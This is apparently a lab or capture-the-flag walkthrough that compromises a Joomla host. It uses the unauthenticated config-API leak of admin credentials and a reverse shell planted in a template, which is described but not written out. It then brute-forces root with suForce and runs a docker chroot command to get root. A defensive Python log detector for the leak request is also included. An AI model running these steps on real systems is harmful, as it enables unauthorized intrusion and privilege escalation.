# Lab setup
Download: Service
NAT, IP: 192.168.1.130
# Penetration process
# Initial reconnaissance
```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http    nginx 1.22.1
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.22.1
8080/tcp open  http    Apache httpd 2.4.54 ((Debian))
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Welcome to nginx!
|_http-open-proxy: Proxy might be redirecting requests
```
This is obviously Joomla; the login page is at http://192.168.1.130:8080/administrator/
Searching for Joomla vulnerabilities turns up a matching entry on exploit-db.
Visit http://192.168.1.130:8080/api/index.php/v1/config/application?public=true
This yields the credentials: admin/j00mL@123###
After logging in, open Templates under System, edit the template's index.php and write a reverse shell into it.
Start a listener, browse to the page, and get a shell.
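From the defender's side, the request to the Joomla configuration endpoint used above is easy to spot in the web server's access log. The following Python is an added example (not part of the original writeup): it parses Apache/nginx combined-format log lines, reports every request to `/api/index.php/v1/config/application`, and marks the ones that carried `public=true` and received a 200 as a likely disclosure of the site configuration. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format: ip ident user [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Joomla web-services endpoint from the writeup: with public=true the vulnerable
# version answers 200 and returns the site configuration, database credentials included.
CONFIG_API = "/api/index.php/v1/config/application"


def detect_config_leak(lines):
    """Return one finding dict per request to the Joomla config API.

    'public' is True when the request carried public=true (the unauthenticated
    variant); 'leaked' is True when that request was also answered with 200,
    the strongest indication that the configuration was actually disclosed.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the whole scan
        parts = urlsplit(m["target"])
        # endswith() so a site installed under a prefix such as /joomla still matches
        if not parts.path.endswith(CONFIG_API):
            continue
        public = parse_qs(parts.query).get("public", [""])[0].lower() == "true"
        findings.append({
            "ip": m["ip"],
            "time": m["time"],
            "public": public,
            "status": int(m["status"]),
            "leaked": public and m["status"] == "200",
        })
    return findings


# Constructed sample: one client probes the endpoint twice amid normal traffic.
SAMPLE_LOG = [
    '192.168.1.50 - - [10/Mar/2024:12:00:01 +0000] "GET /administrator/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Mar/2024:12:00:05 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 104 "-" "curl/8.4.0"',
    '192.168.1.50 - - [10/Mar/2024:12:00:07 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1874 "-" "curl/8.4.0"',
    'malformed line that does not parse',
]

if __name__ == "__main__":
    for finding in detect_config_leak(SAMPLE_LOG):
        print(finding)
```

Any hit with `leaked` set should be treated as a credential exposure: rotate the database password and the Joomla admin password, and patch the Joomla instance.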
# Privilege escalation
Upload suForce and a wordlist to brute-force the root password:
```
www-data@640aa6d0dea4:/var/www/html$ ./suforce -u root -w techyou.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
-=================================-
[*] Username: root
[*] Wordlist: techyou.txt
[i] Status:
366/20000/1%/fucker
[+] Password: fucker Line: 366
-=================================-
```
su to root; root's home directory contains a .joel_key file.
Use this private key to ssh in as joel, then look for files with the SUID bit set: `find / -perm -4000 2>/dev/null`
docker is among them, so escalate directly:
```
joel@service:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
```